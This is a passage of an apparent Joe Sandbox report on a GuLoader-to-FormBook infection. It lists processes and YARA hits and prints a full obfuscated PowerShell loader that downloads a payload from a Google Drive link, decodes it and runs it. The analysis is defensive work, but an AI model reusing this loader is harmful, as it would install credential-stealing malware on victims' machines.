ArgynIkendgAnstr]Skudt:Styre:PreexAN xesSUnhonCUdfleI.fsluII dbr.,rahmGTivolePape tDisteSEge pt Ca.ar ArabiLi,renU,abagHf,rc(diane$IrrigAIwortnSkovtaAstrol Benro Spo.g Offei B.ugergtopsSever)Anst. ');Surere (Herremaend 'T.ans$DiscogNep.elSdmlkoK,opsbSpidsaCarnilStyk.:Spat.SPlatyp ynerePinstrBnnemmK,ytna ReantLeisuoFy rez Reeno chauiDefuncPr.gr= Ento$ Fo,fCDoublu CentlCreedtUdpumuRep.erNo,thoniklalStolpoHjulegTransyForu .RealisEf.acuSuperb DecisFascitDimenrL.satihydronS enogNonni(Scr,e3Kir,e2Mosk 8Be,ys9 ailr3liber3P eud,Samle2Unret8T,stn8,yper2Barn.8Unde.) Tyng ');Surere $Spermatozoic;"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:07:02:59
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:07:03:01
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
                                        Imagebase:0x7ff7b61b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:07:03:10
                                        Start date:24/04/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur elHum,uoFrimefTaskefDamari.luserIm aveThril.Ensars K.gepSemiolLsereiAdj,nt Muns( Daem$Ri.beSTer.otFilmiaEjendrJvnfrtFond.nPortegDomnel KarmeReju,sHamme)Diosm ');$Halloffire=$Tiresol[0];Surere (Herremaend 'Udsk.$Odo igSygevl Stifo CharbTeor,aAntitlBekle:HenslDUlselrPoussoPolydn AmbinTituliArthrnBarwigGitt,l uperuAfkr.nLaan,dCourtsSrlig= OkseN Gas.e,ardewHisto-interOGelfobMolerjNonpreHandecGracetB,nem BlouS TubiyTap us Par tRupice AshrmMet.e.chinkNBarneeTrde,tDataa.ClencW AstreMistybAbaseCOil.alBas,giBrum,eSpejlnSandet lint ');Surere (Herremaend 'Centg$RokadDTilstrOwerwoUnrevnTangfn Macri T ilnescapgPr,hil MiliuSenionC.rpodDe nesPinde.SkaftHLivereN,ncoaS.irodKol.eeAdelsrDelirs Unbe[Unven$aphesAT,ansp Pi,nyUnvaro CablnTartwi MeshnChees1Danse8 Oper2Snkel]F rsv= Ri,s$folkeMRa leo Non nFi unosafias UdsttKasseisuperc ClarhOrdfoiP rlacSorg. ');$Plantaginales173=Herremaend 'Jv frDc talrdykehoUsm,gnAutorn Sttei T.ksnZollegRh.zolXanthu Ko.vnCaverdPastrsS.eak.Kund D Apeno E krwSortin Sh.tl,scitoBran aMammod CardF.emiciHoejalHderseOps a(Regul$JuftsHRadioa ,ounl Na,rlRe,ero Str fEft rfPotleiSam.er DoojeHverv, Bedv$ VestU TroedBinucpboldtoPelobsTeatenDrys.iSkrivnVirilgRygs.)Forur ';$Plantaginales173=$Frituren[1]+$Plantaginales173;$Udposning=$Frituren[0];Surere (Herremaend 'Uegen$c ccigBydefl HedeoRedneb Boneabatc lbevid:MosshS Fwele Frilp,lgefaVelkerpri,rv,lufrcGing.rUnglu=Hek e( PetaTPurlieAlloms epugtskyde- SejrPEquilaSk.tttPrew hSheen Ophi$Sort.U.tjdmdCatnipBe kyoDeters SnoonRecepi Beken TerrgUnive)Dativ ');while (!$Separvcr) {Surere (Herremaend 'skaer$Sleepg eedilfiliao forhbSkovbaFja,tlUnder:olentVCatena D,dinStamtsTalmakTristeRdbyelManiciPalmag Cleas Som,t Drese ejssBigam=backr$Jehult ignarPers uP.ospePit,h ') ;Surere $Plantaginales173;Surere (Herremaend 'KomplSNervetRealkaErinnrFrem,t hypo-SchatSDorsol ,eteeOrigie TeenpP,rip .dmin4Sor,e ');Surere (Herremaend '.atho$Di,itgU,aall Sub.oArmorb,nteraReinvlLim.n:Akva,S.dsteeConvep HoveaGi,ntrDa,bovac rucBohemrDa,br= Pudd(PledgT SuckeSplics NondtAbd,l-ConveP A.sia Asset Toishno,th Asyl$PsykoUFolkedEnt,rpGpiibo Indes,dmntnselvmi Bls.nMajorgbedri)hujed ') ;Surere (Herremaend 'Forfa$VisiogBekenlU.frio Udlbb st,eaChairlGamps:Jor.vOlangup Kli,nGastra AnsiaK,loreHydanlShreds F reeFodgarRe.sesS,ang=Klora$ Pateg Denol SlagoIncurb repraSterelIndlg:SlangBPlansyNonregInte.nAfiseiUncomnHderkg Ih.asPantomSubtesD silsjoseti U brgAnsgn+Sungr+Kredi% Muck$KendiTAlmani PrferSkopueSk,rrsOptagoHandll Bety.HypoccSnderoRamequnoxianCrypttS boe ') ;$Halloffire=$Tiresol[$Opnaaelsers];}Surere (Herremaend ' Isak$ Mgfag orgnlSki po,zimibstavea rserlUncha: TillDFl.lsaDatacaFester Ca.ueAkto,kGeraniDendrsHandet BereeChe gnExtra1Nonab1Rowd.3Patru Enogt=Mi il aguG luoreskubbt Yach-SpateCSandso FiftnAspidtDrhaaeShidenIndiat M,ps Taver$Li,elUTindidOffenp Sta.o DermsKlagenHomefiQ arrnSa.sagSiffl ');Surere (Herremaend 'kommu$IntergTr.nslFosteo S.iabBefj.aOverglIdrcd:Pre.oABlo,knPaabdaCou.il.eremoSlattg MohriMatr e Ga,asYetap Ci,no=Str,f Stylt[ StrySKamelyS,artsToptitUnfiteNonscmWrig..ForfrCstal.oTa.dpnBar.ivStuveeFryser Bi.ltBlung]Ru,de:Endot:T,gneFBe.lyrBiunioGenermOrdu.B.rianaSto,rsRo.teeAntib6Pejor4 VariSArchstLemn rLurediKellinFlawegBurgh(overs$FljlsDhennaa.ingwac,ller .ypheDayb k UnreiFot,es aturtDekupeDiscrn Tils1Virak1Dorso3W.oli)Rent, ');Surere (Herremaend '.drin$Autarg.orfrlMundsoDisc.bFremoaBiofylSkriv:InterC Afsku Imbelvolcat AspouSensirSkratoIr,nelAilanoLitisgDetekyGall, Micki=Tingb Ung a[ DemoSGra mySlvets.argitSprinePetramKey l.KbenhTThyroeSlredxRedegt Bl,n. Ko pETos.onDelircIgu noSal sd Ubesi ArgynIkendgAnstr]Skudt:Styre:PreexAN xesSUnhonCUdfleI.fsluII dbr.,rahmGTivolePape tDisteSEge pt Ca.ar ArabiLi,renU,abagHf,rc(diane$IrrigAIwortnSkovtaAstrol Benro Spo.g Offei B.ugergtopsSever)Anst. ');Surere (Herremaend 'T.ans$DiscogNep.elSdmlkoK,opsbSpidsaCarnilStyk.:Spat.SPlatyp ynerePinstrBnnemmK,ytna ReantLeisuoFy rez Reeno chauiDefuncPr.gr= Ento$ Fo,fCDoublu CentlCreedtUdpumuRep.erNo,thoniklalStolpoHjulegTransyForu .RealisEf.acuSuperb DecisFascitDimenrL.satihydronS enogNonni(Scr,e3Kir,e2Mosk 8Be,ys9 ailr3liber3P eud,Samle2Unret8T,stn8,yper2Barn.8Unde.) Tyng ');Surere $Spermatozoic;"
                                        Imagebase:0xfd0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1925751155.0000000008790000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1919062447.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1925873390.00000000091BB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:6
                                        Start time:07:03:11
                                        Start date:24/04/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Medikamentel.Ddg && echo $"
                                        Imagebase:0xc50000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:07:03:41
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe0000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:07:03:41
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe0000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:07:03:41
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0x7ff70f010000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:16
                                        Start time:07:04:25
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe"
                                        Imagebase:0x3c0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:17
                                        Start time:07:04:27
                                        Start date:24/04/2024
                                        Path:C:\Windows\SysWOW64\replace.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\replace.exe"
                                        Imagebase:0x20000
                                        File size:18'944 bytes
                                        MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:18
                                        Start time:07:04:39
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe"
                                        Imagebase:0x3c0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:19
                                        Start time:07:04:46
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe0000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        General

                                        Target ID:20
                                        Start time:07:04:47
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                        Imagebase:0x7ff671210000
                                        File size:71'680 bytes
                                        MD5 hash:EF3179D498793BF4234F708D3BE28633
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:21
                                        Start time:07:04:51
                                        Start date:24/04/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff73feb0000
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:23
                                        Start time:07:04:56
                                        Start date:24/04/2024
                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                        Imagebase:0xe0000
                                        File size:516'608 bytes
                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Executed Functions

                                          Function 00007FF886E4CED6 Relevance: .5, Instructions: 473COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2365324219.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886e40000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3541f6ed30be1935f8d8ded15db133a47f018be7fb9c0913bef9e1d80f13d16
                                          • Instruction ID: 2040ec574d30d10bdf7f6e12f0ade6fe65f864f57759444cf0f4177be9ea66bf
                                          • Opcode Fuzzy Hash: a3541f6ed30be1935f8d8ded15db133a47f018be7fb9c0913bef9e1d80f13d16
                                          • Instruction Fuzzy Hash: A0F19330918A8D8FEBA8DF28D8557E937E1FF54350F14426AE84DC7291DF38A945CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF886E4DC82 Relevance: .5, Instructions: 459COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2365324219.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886e40000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bb4ed7615d1e37ea04c34a3b9f960e0a206fa3429fc88db642430347dc77d232
                                          • Instruction ID: 2378657476c64345b7e58cc0470508854c9eeaf000740c8ddefcad49be9f2370
                                          • Opcode Fuzzy Hash: bb4ed7615d1e37ea04c34a3b9f960e0a206fa3429fc88db642430347dc77d232
                                          • Instruction Fuzzy Hash: E6E1B130918A8E8FEBA8DF28C8557E977E1FF54350F14426ED84DC7291DE78A944CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF886F14A75 Relevance: .4, Instructions: 430COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2366743858.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886f10000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cde7087f83ab91da5488b82ca683398909215be27049b015a11c5865d3f87feb
                                          • Instruction ID: 678cff758bd285c6e675e0c6103e2e89a76e60837649efed45e0191b4edb71f4
                                          • Opcode Fuzzy Hash: cde7087f83ab91da5488b82ca683398909215be27049b015a11c5865d3f87feb
                                          • Instruction Fuzzy Hash: 1CD10261E1DA8E8FE7A6EB6858156B9BBA1FF953D0B1801BED44CC70D3DA18EC05C341
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF886E43945 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2365324219.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7ff886e40000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                          • Instruction ID: be3fd98d75d27ec4b1f607558638be3019c5f8a5eb3205554f58c07053ce29c0
                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                          • Instruction Fuzzy Hash: FB01677115CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3655DA36E881CB46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 07658898 Relevance: 1.0, Instructions: 1034COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 39280ad68d2dc9c17a9b0e98ba512a1faf3453c36754eef5d3194cfdc80a7c22
                                          • Instruction ID: 0001242fc2e153cde12a161659ba5275146bad0234cd352e6ed29d03cdb42d6d
                                          • Opcode Fuzzy Hash: 39280ad68d2dc9c17a9b0e98ba512a1faf3453c36754eef5d3194cfdc80a7c22
                                          • Instruction Fuzzy Hash: 7C82B4B0B10306DFDB24DB68C854BAEB7B2AF85300F14C46AD806AB755DB71ED41DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07657728 Relevance: .9, Instructions: 933COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2bd90c208b55e43b7a7acf749a81d1af47adde31d41beae0349bd3670e26ce0c
                                          • Instruction ID: 55f1485fd345130078f2811b4f9404532f0e4176a6d28dd8719529af357f16fe
                                          • Opcode Fuzzy Hash: 2bd90c208b55e43b7a7acf749a81d1af47adde31d41beae0349bd3670e26ce0c
                                          • Instruction Fuzzy Hash: 1F828FB0B00205DFDB14CBA8C454BAEBBB2AF89304F14C46AD90A9F755DB72ED42DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0765E0E5 Relevance: .7, Instructions: 704COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d9b7992827d3c916d95aacb35c256d704c08fa45556282ae103cc6c0b28a75b
                                          • Instruction ID: b384f1156d97f47bc391dd7be2d7a1b2d5194359d7535a7dc77d24299cb18c5d
                                          • Opcode Fuzzy Hash: 5d9b7992827d3c916d95aacb35c256d704c08fa45556282ae103cc6c0b28a75b
                                          • Instruction Fuzzy Hash: 65624DB0A00218DFEB64DB64C994BDEB7B2EF89304F1084E6D9096B351DB759E81CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FCD848 Relevance: .5, Instructions: 524COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f4e7576a3e6853b7de7f3092f91f7938dd6e5b69be136170a4617cb6d42792b
                                          • Instruction ID: 9f4ba37eb3f6f03ca970aaef4f00e1ee744434f1eb6d993c2c58dfa85552f11d
                                          • Opcode Fuzzy Hash: 3f4e7576a3e6853b7de7f3092f91f7938dd6e5b69be136170a4617cb6d42792b
                                          • Instruction Fuzzy Hash: F8229134B002298FCB25DB24D955BAEB7F2BF89301F1444A9D40AAB361DF359E85DF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07650638 Relevance: .5, Instructions: 488COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35b46ba2a2386f4054a6dac6da1c3597ef9b45a4095cbf3c9641cc28f153f4a9
                                          • Instruction ID: 7af4a91d200b9ae63ba524b557ef9dd66ef34aa834908111eb5bee6a434d06de
                                          • Opcode Fuzzy Hash: 35b46ba2a2386f4054a6dac6da1c3597ef9b45a4095cbf3c9641cc28f153f4a9
                                          • Instruction Fuzzy Hash: B9F116B17043569FDB258B74D85076ABBA2EFC6311F18C4ABD846CB352DA32CC42D7A1
